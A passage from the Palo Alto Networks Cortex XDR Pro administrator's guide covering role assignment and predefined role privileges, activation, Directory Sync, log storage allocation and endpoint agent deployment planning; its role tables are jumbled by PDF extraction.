configure administrative access depends on the security requirements of your organization. The built-in
roles provide specific access rights that cannot be changed. The roles you create provide more granular
access control.
When your organization purchases Cortex XDR, the Account Administrator can use the Palo Alto Networks
hub to assign roles to other members that have accounts in the Customer Support Portal.
To activate Cortex XDR apps, you must be assigned either the Account Administrator or App Administrator
role for Cortex XDR. If you are activating a new Cortex Data Lake instance you must also be assigned either
administrative role for Cortex Data Lake.
After activation, Account Administrators can assign additional users roles to manage your apps. If the user
only needs to manage a specific instance of an app, you can assign the Instance Administrator role.
To assign the roles, Account Administrators (or users that are assigned the App Administrator for the
relevant app) can take the following steps:

STEP 1 | If necessary, add a new Customer Support Portal user.

To be eligible for role assignment in the hub, the user must have an account in the Customer Support
Portal (https://support.paloaltonetworks.com/) and be assigned any of the following Customer Support
Portal roles: Super User, Standard User, or Limited User. Skip this step if the user already has a Customer
Support Portal account with an appropriate role.

STEP 2 | Manage the level of access for a Cortex XDR user.

1.
Log in to the hub and select > Access Management.
2. Use the sidebar to filter users as needed or the search field to search for users.
3. Select one or more users and then Assign Roles.

30 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
4. In the Assign Roles page for each instance, select one of the following options:
• Assign Permissions—Create a new role or assign selected permissions.
• Cortex XDR Predefined Role—Select one of the predefined Cortex XDR role. Select Role
Definitions to view a list of the Cortex predefined roles and the allocated views and actions.
• No Role—User is not assigned any view or action access to the Cortex XDR app.

5. (Optional) To create a new role:

1. After you selected Assign Permissions, in the Assign Custom Permissions pop-up, select which
IN_APP VIEWS and IN_APP ACTIONS permissions you want to grant.
2. Save As New Role to create a new role that you can apply to other users, or Save to apply the
selected permissions to the user without a defined role.

The new rule is displayed with User Created (UC) icon. Select the role to apply permissions to the
user and then Save.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 31
© 2020 Palo Alto Networks, Inc.
 6. (Optional) To edit or clone a user created role:
1.
Select > Access Management > Manage Roles.
2. In the Manage Roles Cortex XDR page, find your user created role and select Actions.
3. Edit Permissions, Clone, or Delete your role, as desired.

Predefined User Roles for Cortex XDR

Role-based access control (RBAC) enables you to use preconfigured roles to assign access rights to
administrative users. You can manage roles for all Cortex apps and services in the hub. By assigning roles,
you enforce the separation of access among functional or regional areas of your organization.
Each role extends specific privileges to users. The way you configure administrative access depends on the
security requirements of your organization. Use roles to assign specific access privileges to administrative
user accounts. The built-in roles provide specific access rights that cannot be changed. Use hub roles to
provide full access to Cortex XDR with three levels: Account, App, or Instance. If you desire more granular
access control, you can assign any of the Cortex XDR app roles.
The following table describes the Cortex XDR predefined roles and the view and action privileges
associated with each.

Some features are license dependent. As a result users may not see a specific feature if
the feature is not supported by the license type or if they do not have access based on their
assigned role.

Role View Privileges Action Privileges

App Administrator • Endpoints • Configurations

The user has full access to • Endpoint Profiles • Public API
the given apps, including • Global Exceptions • Alert Notifications
all current and future app • Endpoint Policies • Threat Intelligence
instances. App Administrator • Endpoint Management • General Configuration
can assign roles for app
• Endpoint Installations • On-demand Analytics
instances, and can also
activate app instances • Device Control • External Alerts Mapping
specific to that app. • Vulnerability Assessment • EDL Configuration
• Host Insights • SaaS Log Collection

32 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Role View Privileges Action Privileges
Requires a Cortex XDR • Investigation • Broker Service
license. • Investigation
• Rules
• Incidents • Incidents
• Alerts • Alerts
• Response • Rules
• Action Center • Assets
• Scripts • Network Configuration
• Configurations • Response
• Public API • File Search
• Auditing • Destroy Files
• Alert Notifications • Remediation
• Threat Intelligence • Quarantine
• On-demand Analytics • Request WildFire Verdict
• External Alerts Mapping Change
• EDL Configuration • Block list
• SaaS Log Collection • Terminate Process
• Pathfinder Applet • Isolate
• Pathfinder Data Collection • Live Terminal
• Ingestion Monitoring • EDL
• Assets • Run Standard Script
• Run High-Risk Script
• Asset Management
• Script Configurations
• File Retrieval
• Endpoints
• Retrieve Endpoint Data
• Endpoint Scan
• Endpoint Profiles
• Global Exceptions
• Endpoint Policies
• Endpoint Management
• Endpoint Installations
• Device Control
• Vulnerability Assessment
• Host Insights
• Change Managing Server
• Broker VM
• Manage
• Pathfinder Applet
• Pathfinder Data
Collection

Instance Administrator • Endpoints • Configurations

The user has full access • Endpoint Profiles • Public API
to the app instance. The • Global Exceptions • Alert Notifications
Instance Administrator can • Endpoint Policies • Threat Intelligence
make other users Instance

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 33
© 2020 Palo Alto Networks, Inc.
 Role View Privileges Action Privileges
Administrator for the app • Endpoint Management • General Configuration
instance. If the app has • Endpoint Installations • On-demand Analytics
predefined or custom roles, • Device Control • External Alerts Mapping
the Instance Administrator • Vulnerability Assessment • EDL Configuration
can assign those roles to
• Host Insights • SaaS Log Collection
other users.
• Investigation • Broker Service
• Rules • Investigation
• Incidents • Incidents
• Alerts • Alerts
• Response • Rules
• Action Center • Assets
• Scripts • Network Configuration
• Configurations • Response
• Public API • File Search
• Auditing • Destroy Files
• Alert Notifications • Remediation
• Threat Intelligence • Quarantine
• General Configuration • Request WildFire Verdict
• On-demand Analytics Change
• External Alerts Mapping • Block List
• Broker Services • Terminate Process
• Pathfinder AppletPathfinder • Isolate
Data Collection • Live Terminal
• Ingestion Monitoring • EDL
• Assets • Run Standard Script
• Asset Management • Run High-Risk Script
• Script Configurations
• File Retrieval
• Endpoints
• Retrieve Endpoint Data
• Endpoint Scan
• Endpoint Profiles
• Global Exceptions
• Endpoint Policies
• Endpoint Management
• Endpoint Installations
• Device Control
• Vulnerability Assessment
• Host Insights
• Change Managing Server
• Broker VM
• Manage
• Pathfinder Applet
• Pathfinder Data
Collection

34 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Role View Privileges Action Privileges

Viewer • Endpoints —
Can view the majority of the • Endpoint Profiles
features of the Cortex XDR • Global Exceptions
app for this instance, but can • Endpoint Policies
take no actions. • Endpoint Management
Requires a Cortex XDR • Endpoint Installations
license. • Device Control
• Vulnerability Assessment
• Host Insights
• Investigation
• Rules
• Incidents
• Alerts
• Response
• Action Center
• Scripts
• Configurations
• Auditing
• General Configuration
• Pathfinder Applet
• Pathfinder Data Collection
• Assets
• Asset Management

Security Admin • Endpoints • Configurations

Can triage and investigate • Endpoint Profiles • General Configuration
alerts and incidents, respond • Global Exceptions • EDL Configuration
(excluding Live Terminal), • Endpoint Policies • Saas Log Collection
and edit profiles and policies. • Endpoint Management • Investigation
Requires a Cortex XDR • Endpoint Installations • Rules
Prevent or Cortex XDR Pro • Device Control • Incidents
per Endpoint license. • Vulnerability Assessment • Alerts
• Host Insights • Response
• Investigation
• Quarantine
• Rules • Request WildFire Verdict
• Incidents Change
• Alerts • Block List
• Response • Terminate Process
• Action Center • Isolate
• Scripts • EDL
• Configurations • Endpoints
• General Configuration • Retrieve Endpoint Data
• EDL Configuration • Endpoint Scan
• Saas Log Collection • Endpoint Profiles

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 35
© 2020 Palo Alto Networks, Inc.
 Role View Privileges Action Privileges
• Assets • Endpoint Policies
• Asset Management • Vulnerability Assessment
• Host Insights

Privileged Security Admin • Endpoints • Configurations

Can triage and investigate • Endpoint Profiles • Alert Notifications
alerts and incident, respond, • Global Exceptions • Threat Intelligence
and edit profiles and policies. • Endpoint Policies • General Configuration
Requires a Cortex XDR • Endpoint Management • On-demand Analytics
Prevent or Cortex XDR Pro • Endpoint Installations • EDL Configuration
per Endpoint license. • Device Control • SaaS Log Collection
• Vulnerability Assessment • Broker Service
• Host Insights • Investigation
• Investigation • Rules
• Rules • Incidents
• Incidents • Alerts
• Alerts • Assets
• Response • Network Configuration
• Action Center • Response
• Scripts • File SearchDestroy Files
• Configurations • Remediation
• Auditing • Quarantine
• Alert Notifications • Request WildFire Verdict
• Threat Intelligence Change
• General Configuration • Block Llist
• On-demand Analytics • Terminate Process
• EDL Configuration • Isolate
• SaaS Log Collection • Live Terminal
• Broker Service • EDL
• Run Standard Script
• Run High-Risk Script
• Script Configurations
• File Retrieval
• Endpoints
• Retrieve Endpoint Data
• Endpoint Scan
• Endpoint Profiles
• Endpoint Policies
• Device Control
• Vulnerability Assessment
• Host Insights

IT Admin • Endpoints • Configurations

Can manage and control • Endpoint Profiles • General Configuration
endpoints and installations, • Global Exceptions • Saas Log Collection
• Endpoint Policies • Broker Service

36 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Role View Privileges Action Privileges
configure brokers, view • Endpoint Management • Endpoints
profiles, policies, and alerts. • Endpoint Installations • Retrieve Endpoint Data
Requires a Cortex XDR • Device Control • Global Exceptions
Prevent or Cortex XDR Pro • Vulnerability Assessment • Endpoint Management
per Endpoint license. • Host Insights • Endpoint Installations
• Investigation • Vulnerability Assessment
• Incidents • Host Insights
• Alerts • Broker VM
• Response • Pathfinder Applet
• Action Center • Pathfinder Data Collection
• Configurations
• Saas Log Collection
• Broker Service
• Pathfinder Applet
• Pathfinder Data Collection
• Ingestion Monitoring
• Assets
• Asset Management

Privileged IT Admin • Endpoints • Configurations

Can manage and control • Endpoint Profiles • General Configuration
endpoints and installations, • Endpoint Policies • Saas Log Collection
configure brokers, create • Endpoint Management • Broker Service
profiles and policies, view • Endpoint Installations • Investigation
alerts, and initiate Live
• Device Control • Incidents
Terminal.
• Vulnerability Assessment • Alerts
Requires a Cortex XDR • Host Insights
Prevent or Cortex XDR Pro • Assets
• Investigation
per Endpoint license. • Network Configuration
• Incidents • Response
• Alerts
• Response • File Search
• Destroy Files
• Action Center • Remediation
• Scripts • Request WildFire Verdict
• Configurations Change
• General Configuration • Live Terminal
• Saas Log Collection • Run Standard Script
• Broker Service • Run High-Risk Script
• Pathfinder Applet • Script Configurations
• Pathfinder Data Collection • File Retrieval
• Ingestion Monitoring • Endpoints
• Assets • Retrieve Endpoint Data
• Asset Management • Global Exceptions
• Endpoint Management
• Endpoint Installations
• Device Control

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 37
© 2020 Palo Alto Networks, Inc.
 Role View Privileges Action Privileges
• Vulnerability Assessment
• Host Insights
• Broker VM
• Pathfinder Applet
• Pathfinder Data Collection

Deployment Admin • Endpoints • Configurations

Can manage and control • Global Exceptions • Broker Service
endpoints and installations, • Endpoint Management • Endpoints
and configure brokers. • Endpoint Installations • Endpoint Management
Requires a Cortex XDR • Configurations • Endpoint Installations
Prevent or Cortex XDR Pro • Auditing • Change Managing Server
per Endpoint license.
• Broker Services • Broker VM
• Broker Service • Pathfinder Applet
• Pathfinder Applet • Pathfinder Data Collection
• Pathfinder Data Collection
• Assets
• Asset Management

Investigation Admin • Endpoints • Configurations

Can view and triage alerts • Endpoint Profiles • EDL Configuration
and incidents, configure • Endpoint Policies • Investigation
rules, and view the profiles • Device Control
and policies and analytics • Rules
• Vulnerability Assessment • Incidents
management screens.
• Host Insights • Alerts
Requires a Cortex XDR • Investigation • Response
license.
• Rules • EDL
• Incidents • Endpoints
• Alerts
• Response • Endpoint Scan
• Device Control
• Action Center • Vulnerability Assessment
• Configurations • Host Insights
• EDL Configuration

Investigator • Investigation • Investigation

Can view and triage alerts • Incidents • Incidents
and incidents. • Alerts • Alerts
Requires a Cortex XDR • Endpoints
license. • Retrieve Endpoint Data
• Endpoint Scan

Privileged Investigator • Endpoints • Configurations

Can view and triage alerts, • Endpoint Profiles • EDL Configuration
incidents and rules, profiles • Endpoint Policies • Investigation

38 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Role View Privileges Action Privileges
and policies and analytics • Device Control • Incidents
management screens. • Vulnerability Assessment • Alerts
Requires a Cortex XDR Pro • Host Insights • Assets
per Endpoint license. • Investigation • Network Configuration
• Rules • Response
• Incidents • EDL
• Alerts • Endpoints
• Response
• Endpoint Scan
• Action Center • Device Control
• Configurations • Vulnerability Assessment
• EDL Configuration • Host Insights
• Assets
• Asset Management

Responder • Investigation • Response

Can view and triage alerts, • Rules • Quarantine
and access all response • Incidents • Request WildFire Verdict
capabilities excluding Live • Alerts Change
Terminal. • Response • Block List
Requires a Cortex XDR • Terminate Process
• Action Center
Prevent or Cortex XDR Pro • Isolate
per Endpoint license. • EDL
• Endpoints
• Retrieve Endpoint Data
• Endpoint Scan

Privileged Responder • Endpoints • Configurations

Can view and triage alerts • Endpoint Profiles • General Configuration
and incidents, access all • Endpoint Policies • EDL Configuration
response capabilities, and • Endpoint Management • Investigation
configure rules, policies, and • Device Control
profiles. • Rules
• Vulnerability Assessment • Incidents
Requires a Cortex XDR • Host Insights • Alerts
license. • Investigation • Assets
• Rules • Network Configuration
• Incidents • Response
• Alerts
• Response • File Search
• Destroy Files
• Action Center • Remediation
• Scripts • Quarantine
• Configurations • Request WildFire Verdict
• General Configuration Change
• EDL Configuration • Block List
• Pathfinder Applet • Terminate Process
• Isolate

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 39
© 2020 Palo Alto Networks, Inc.
 Role View Privileges Action Privileges
• Pathfinder Data Collection • Live Terminal
• Assets • EDL
• Asset Management • Run Standard Script
• Run High-Risk Script
• Script Configurations
• File Retrieval
• Endpoints
• Retrieve Endpoint Data
• Endpoint Scan
• Device Control
• Vulnerability Assessment
• Host Insights

40 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Activate your Network Devices
With a Cortex XDR Pro per TB license, if you use Palo Alto Networks firewalls as a traffic log source, you
must activate your firewalls and Panorama and configure them for log forwarding to Cortex Data Lake.

STEP 1 | Register and activate your firewalls and Panorama.

STEP 2 | Onboard Panorama-Managed Firewalls to Cortex Data Lake.

STEP 3 | Upgrade firewalls and Panorama to the latest software and content releases.
PAN-OS 8.0.6 is the minimum required software release version for Palo Alto Networks firewalls and
Panorama. However, to enable Cortex XDR to leverage the Directory Sync Service and Enhanced
Application Logs, upgrade firewalls and Panorama to PAN-OS 8.1.1 or later and to the latest content
release:
Get the latest application and threat content updates.
Upgrade to PAN-OS 8.1.1.

STEP 4 | Ensure that firewalls have visibility into internal traffic and applications.
It’s important that at least one firewall sending logs to the Cortex Data Lake is processing or has visibility
into internal traffic and applications.
If you have deployed only internet gateway firewalls, one option might be to configure a tap interface to
give a firewall visibility into data center traffic even though the firewall is not in the traffic flow. Connect
the tap mode interface to a data center switch SPAN or mirror port that provides the firewall with the
mirrored traffic, and make sure that the firewall is enabled to log the traffic and send it to the Cortex
Data Lake.
Because data center firewalls already have visibility into internal network traffic, you don’t need to
configure these firewalls in tap mode; however, contact Palo Alto Networks Professional Services for
best practices to ensure that the Cortex Data Lake and Cortex XDR-required configuration updates do
not affect data center firewall deployments.

STEP 5 | Configure firewalls to forward Cortex XDR-required logs to Cortex Data Lake.
The Cortex Data Lake provides centralized, cloud-based log storage for firewalls, and Panorama provides
an interface you can use to view the stored logs. The rich log data that firewalls forward to the Cortex
Data Lake provides the Cortex XDR analytics engine the network visibility it requires to perform data
analytics.
To support Cortex XDR, firewalls must forward at least Traffic logs to the Cortex Data Lake. The
complete set of log types that a firewall should forward to the Cortex Data Lake are:
Traffic (required)
Threat (spyware, anti-exploit, anti-malware, dns security, etc)
URL Filtering
User-ID
HIP
Enhanced application logs (PAN-OS 8.1.1 or later)
Enhanced application logs are designed to increase visibility into network activity for Palo Alto Networks
Cloud Services apps, and Cortex XDR requires these logs to support certain features.
Follow the complete workflow to configure Panorama-managed firewalls to forward logs to the Cortex
Data Lake.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 41
© 2020 Palo Alto Networks, Inc.
Activate Cortex XDR
Use the hub (https://apps.paloaltonetworks.com) to activate Cortex XDR. This is a one-time task you’ll
need to perform when you first start using Cortex XDR. After you’ve activated the Cortex XDR app—and
completed all the steps described in Set up Cortex XDR Pro Overview—you’ll only need to repeat the
activation if you want to add additional app instances.
To activate the Cortex XDR app, you must be assigned a required role and locate your activation email
containing a link to begin activation in the hub. Activating Cortex XDR automatically includes activation of
Cortex Data Lake.

STEP 1 | Begin activation.

1. Click the activation link you received in email to begin activation in the hub.
2. If you manage multiple company CSP accounts, make sure you select the specific account to which
you want to allocate the Cortex XDR license to before proceeding with activation.

The hub will associate activation of Cortex XDR and the included apps and services
only with the selected account.
3. From the Cortex XDR tile, select the serial number you want to activate.
If there is only one serial number associated with your company account, you can click the tile to
begin activation.

If you have multiple serial numbers associated, click each one to activate.

42 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
STEP 2 | Provide details about the Cortex XDR app you’re activating.

• Company Account—Identifies the company account under which you are activating Cortex XDR.
• Name—Give your Cortex XDR app instance an easily-recognizable name and optional Description.
If you have more than one Cortex XDR instance, the hub displays the name in the instance list when
you select the Cortex XDR tile. Choose a name that is 59 or fewer characters and is unique across
your company account.
• Subdomain—Give your Cortex XDR instance an easy to recognize name. The hub displays the name
you assign on the list of available instances for the Cortex XDR app. You can also access the Cortex
XDR app directly using the full URL (https:// <subdomain>.xdr. <region>.paloaltonetworks.com). If
you are converting an existing Traps management service to Cortex XDR, this field is grayed out.
• Cortex Data Lake—Select the Cortex Data Lake instance that will provide the Cortex XDR apps with
log data.
If you activated with an auth code, provision a new Cortex Data Lake instance by selecting the link
to activate purchased licenses and provide the separate Cortex Data Lake auth code you received in
email.
If you activated with the activation link, you can automatically provision a new Cortex Data Lake
instance in the region you select or select an existing Cortex Data Lake and increase its size.

You can only select a Cortex Data Lake instance that is not allocated to another
Cortex XDR instance. When you select a Cortex Data Lake instance, the hub
provisions your Cortex XDR instance in the same region.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 43
© 2020 Palo Alto Networks, Inc.
 • Region—Select a region in which you want to set up your Cortex Data Lake instance. If you selected
an existing Cortex Data Lake instance, this field automatically displays the region in which your
Cortex Data Lake instance is deployed and cannot be changed.
• Directory Sync—(Optional) Select the Directory Sync Service instance that will provide the Cortex
XDR app with Active Directory data. If there is only one Directory Sync Service instance for the
selected Cortex Data Lake region, the hub automatically selects it for pairing with the Cortex XDR
app, however you can clear the default selection, if desired. If you do not currently have a Directory
Sync Service activated and configured for your account, you can select the link to create an instance
now, or you can add one at a later time.

STEP 3 | Review the end user license agreement and Agree & Activate.
The hub displays the activation status as it activates and provisions your apps. It can take up to an hour
to complete activation. After activation completes, the hub displays a summary that shows the details for
your apps and services.

STEP 4 | Manage Apps to view the current status of your apps.

When the app is available you will see a green check mark in the STATUS column. To return to the
status page at a later time, return to the hub and select > Manage Apps.

STEP 5 | When your app is available, log in to your Cortex XDR app to confirm that you can successfully
access the Cortex XDR app interface.

STEP 6 | Allocate Log Storage for Cortex XDR.

Review the storage allocation for your Cortex Data Lake and adjust the quota as needed. You must be an
assigned an Instance Administrator or higher role to for Cortex Data Lake to manage logging storage.

STEP 7 | Assign roles to additional administrators, if needed.

STEP 8 | Complete your configuration.

If you have a Cortex XDR Pro per Endpoint license, continue to Set up Endpoint Protection. Otherwise
proceed to Set up Network Analysis.

44 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Set Up Directory Sync
Directory Sync is an optional service that enables you to leverage Active Directory user, group, and
computer information in Cortex XDR apps to provide context when you investigate alerts. You can use
Active Directory information in policy configuration and endpoint management.
After you finish the setup, Cortex XDR automatically updates when the DSS agent updates.
To set up Directory Sync:

STEP 1 | Add and configure your Directory Sync instance.

See the Directory Sync Service Getting Started Guide for instructions.

STEP 2 | Pair the Directory Sync to Cortex XDR apps.

Pairing can occur during Cortex XDR activation or after you activate Cortex XDR apps.

STEP 3 | After you activate and pair Cortex XDR apps with Directory Sync, you must define which
Active Directory domain the analytics engine should use.

Wait about ten minutes after you have paired Directory Sync before you do this.

Pairing Directory Sync

If you did not pair Directory Sync to your Cortex apps during Cortex XDR activation, you can later pair it
with your Cortex XDR instance.

STEP 1 | Log into the hub.

STEP 2 |
Click the gear > Manage Apps in the upper-right corner.

STEP 3 | Locate the Directory Sync instance that you want to use with Cortex XDR. Make a note of the
instance's name, which appears in the left-most column.
If you have more than one instance, make sure you choose the instance that is in the same region as the
Cortex Data Lake instance you are using with your apps.

STEP 4 | Pair the Directory Sync instance with your Cortex XDR instance.
1. Scroll down until you find your Cortex XDR instance in the Cortex XDR section.
2. Click on its name in the left-most column.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 45
© 2020 Palo Alto Networks, Inc.
 3. In the resulting pop-up configuration screen, select the desired Directory Sync instance, and then
click OK.

46 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Allocate Log Storage for Cortex XDR
You receive Cortex Data Lake log storage based on the amount of storage associated with your Cortex XDR
Licenses. Generally, this capacity is determined by factors such as the size of your network and number of
endpoints in your deployment.
Cortex XDR Pro per Endpoint and Cortex XDR Pro per TB licenses grant a daily ingestion quota of the
number of TBs / 30 in addition to the same amount of TBs in storage.
For example: Cortex XDR Pro per TB 10
• Daily ingestion quota calculated according to 10TB / 30 = 333GB
• Storage = 10TB
To increase your capacity, contact your Palo Alto Network account representative.
When you activate Cortex XDR, Cortex Data Lake assigns a default storage allocation for your logs, EDR
data, and alerts. While some Cortex apps receive a default allocation, with a Cortex XDR Pro per TB license,
you must manually allocate storage for firewall logs. After you activate Cortex XDR, review and adjust your
log storage allocation depending on your storage requirements.

Cortex Data Lake displays the current possible allocation but does not display the storage
usage.

To allocate your log storage quota:

STEP 1 | Sign In to the Palo Alto Networks hub at https://apps.paloaltonetworks.com/.

STEP 2 | Select your Cortex Data Lake instance.

If you have multiple Cortex Data Lake instances, select the Cortex Data Lake tile and then select the
Cortex Data Lake instance from the list of available instances associated with your account.
Cortex Data Lake displays the service status and your total logging storage capacity.

STEP 3 | Select Configuration to define logging storage settings.

Cortex Data Lake displays the total storage allocated for the apps and services associated with the
Cortex Data Lake instance.
The Cortex Data Lake depicts your storage allocation graphically. As you adjust your storage allocation,
the graphic updates to display the changes to your storage policy. The Cortex Data Lake storage
policy specifies the distribution of your total storage allocated to each app or service and the minimum
retention warning (not supported with Cortex XDR).

STEP 4 | Allocate quota for Cortex XDR.

1. If you purchased quota for firewall logs, allocate quota to the Firewall log type.
To use the same Cortex Data Lake instance for both firewall logs and Cortex XDR logs, you must first
associate Panorama with the Cortex Data Lake instance before you can allocate quota for firewall
logs.
2. Review your storage allocation for Cortex XDR according to the formula:
1TB for every 200 Cortex XDR Pro endpoints for 30 days
By default, 80% of your available storage for Cortex XDR is assigned to logs and data, and 20%
is assigned to alerts. It is recommended to review the status of your Cortex Data Lake instance

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 47
© 2020 Palo Alto Networks, Inc.
 after about two weeks of data collection and make adjustments as needed but to use the default
allocations as a starting point.
Use the Cortex Data Lake Calculator to calculate how many logs are ingested and add additional TBs
accordingly.

STEP 5 | Apply your changes.

STEP 6 | Monitor your data retention.

Cortex XDR retains your endpoint data according to the allocated quota in Cortex XDR Data Lake. Make
sure your data retention is sufficient for your environment.

By default, Cortex XDR will not remove data less than 30 days, however you must
allocate the quotain order for Cortex XDR to support the retention.

1.
From Cortex XDR, navigate to > Cortex XDR License.
2. In the Endpoint XDR Data Retention section, review the following:

48 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
 • Current number of days your data has been stored in Cortex XDR Data Lake. The count begins
the as soon as you activate Cortex XDR.
• Number of retention days permitted according to the quota you allocated.
3. If needed, update your Cortex XDR allocated quota.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 49
© 2020 Palo Alto Networks, Inc.
Set up Endpoint Protection
The Cortex XDR agent monitors endpoint activity and collects endpoint data that Cortex XDR uses to
raise alerts. Before you can begin collecting endpoint data, you must deploy the Cortex XDR agent and
configure endpoint policy. To use endpoint management functions in Cortex XDR you must be assigned an
administrative role in the hub.

STEP 1 | Verify the status of your Cortex XDR tenant.

1. From the hub, click the gear icon next to your name.
2. In the Cortex area, review the STATUS for the tenant you just activated.
When Cortex XDR tenant is available, the status changes to the green check mark.

STEP 2 | Plan Your Agent Deployment.

STEP 3 | Enable Access to Cortex XDR.

STEP 4 | (Optional) Set up Broker VM communication.

STEP 5 | Install the Cortex XDR agent on your endpoints.

Install the agent software directly on an endpoint or use a software deployment tool of your choice
(such as JAMF or GPO) to distribute and install the software on multiple endpoints.
1. Create an Agent Installation Package.
2. Install the Cortex XDR agent.
For instructions by operating system, see the Cortex XDR Agent Administrator’s Guide or the Traps
Agent Administrator’s Guide if you use an earlier version.

STEP 6 | Define Endpoint Groups to which you can apply endpoint security policy.

STEP 7 | Customize your Endpoint Security Profiles and assign them to your endpoints.
Cortex XDR provides out-of-the box exploit and malware protection. However, at minimum, you must
enable Data Collection in an Agent Settings profile to leverage endpoint data in Cortex XDR apps. Data
collection for Windows endpoints is available with Traps 6.0 and later releases and on endpoints running
Windows 7 SP1 and later releases. Data collection on macOS and Linux endpoints are available with
Traps 6.1 and later releases.

STEP 8 | (Optional) Configure Device Control profiles to restrict file execution on USB-connected
devices.

STEP 9 | Verify that the Cortex XDR agent can connect to your Cortex XDR instance.
If successful, the Cortex XDR console displays a Connected status. You can view the status of all agents
on the Endpoints > Endpoint Management of your Cortex XDR management console.

STEP 10 | Configure the internal networks that you want Cortex XDR to monitor.
1. From the Cortex XDR management console, navigate to Assets > Network Configuration > IP
Address Ranges.
2. Define your IP Address Ranges.
This page provides a table of the IP address ranges Cortex XDR Analytics monitors, which is pre-
populated with the default IPv4 and IPv6 address spaces.

50 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
 3. Define your Domain Names.

STEP 11 | If you also have a Cortex XDR Pro per TB license, proceed to Set up Network Analysis.
Otherwise, proceed to Configure Cortex XDR.

Plan Your Agent Deployment

You typically deploy Cortex XDR agent software to endpoints across a network after an initial proof of
concept (POC), which simulates your corporate production environment. During the POC or deployment
stage, you analyze security events to determine which are triggered by malicious activity and which are due
to legitimate processes behaving in a risky or incorrect manner. You also simulate the number and types of
endpoints, the user profiles, and the types of applications that run on the endpoints in your organization
and, according to these factors, you define, test, and adjust the security policy for your organization.
The goal of this multi-step process is to provide maximum protection to the organization without interfering
with legitimate workflows.
After the successful completion of the initial POC, we recommend a multi-step implementation in the
corporate production environment for the following reasons:
• The POC doesn't always reflect all the variables that exist in your production environment.
• There is a rare chance that the Cortex XDR agent will affect business applications, which can reveal
vulnerabilities in the software as a prevented attack.
• During the POC, it is much easier to isolate issues that appear and provide a solution before full
implementation in a large environment where issues could affect a large number of users.
A multi-step deployment approach ensures a smooth implementation and deployment of the Cortex XDR
solution throughout your network. Use the following steps for better support and control over the added
protection.

Step Duration Plan

0. Calculate the bandwidth as needed For every 100,000 agents, you will need
required to support the number of to allocate 120Mbps of bandwidth. The
agents you plan to deploy. bandwidth requirement scales linearly. For
example, to support 300,000 agents, plan to
allocate 360Mbps of bandwidth (three times
the amount required for 100,000 agents).

1. Install Cortex XDR on 1 week Install the Cortex XDR agent on a small
endpoints. number of endpoints (3 to 10).
Test normal behavior of the Cortex XDR
agents (injection and policy) and confirm that
there is no change in the user experience.

2. Expand the Cortex XDR 2 weeks Gradually expand agent distribution to larger
deployment. groups that have similar attributes (hardware,
software, and users). At the end of two weeks
you can have Cortex XDR deployed on up to
100 endpoints.

3. Complete the Cortex XDR 2 or more weeks Broadly distribute the Cortex XDR agent
installation. throughout the organization until all endpoints
are protected.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 51
© 2020 Palo Alto Networks, Inc.
 Step Duration Plan

4. Define corporate policy and Up to 1 week Add protection rules for third-party or in-
protected processes. house applications and then test them.

5. Refine corporate policy and Up to 1 week Deploy security policy rules to a small
protected processes. number of endpoints that use the applications
frequently. Fine tune the policy as needed.

6. Finalize corporate policy and A few minutes Deploy protection rules globally.
protected processes.

Enable Access to Cortex XDR

After you receive your account details, enable and verify access to Cortex XDR.

STEP 1 | (Optional) If you are deploying the broker VM as a proxy between Cortex XDR and the Cortex
XDR agents, start by enabling the communication between them.

STEP 2 | In your firewall configuration, enable access to Cortex XDR communication servers, storage
buckets, and resources.
For the complete list or resources, refer to Resources Required to Enable Access for Cortex XDR.
With Palo Alto Networks firewalls, we recommend that you use the following App-IDs to allow
communication between Cortex XDR agents and the Cortex XDR management console when you
configure your security policy:
• cortex-xdr—Requires PAN-OS Applications and Threats content update version 8279 or a later
release.
• traps-management-service—Requires PAN-OS Applications and Threats content update
version 793 or a later release.
If you use App-ID in your security policy, you must also allow access for additional resources that are
not covered by the App-ID. If you do not use Palo Alto Networks firewalls with App-ID you must allow
access to the full list of resources.

STEP 3 | To establish secure communication (TLS) to Cortex XDR, the endpoints, and any other devices
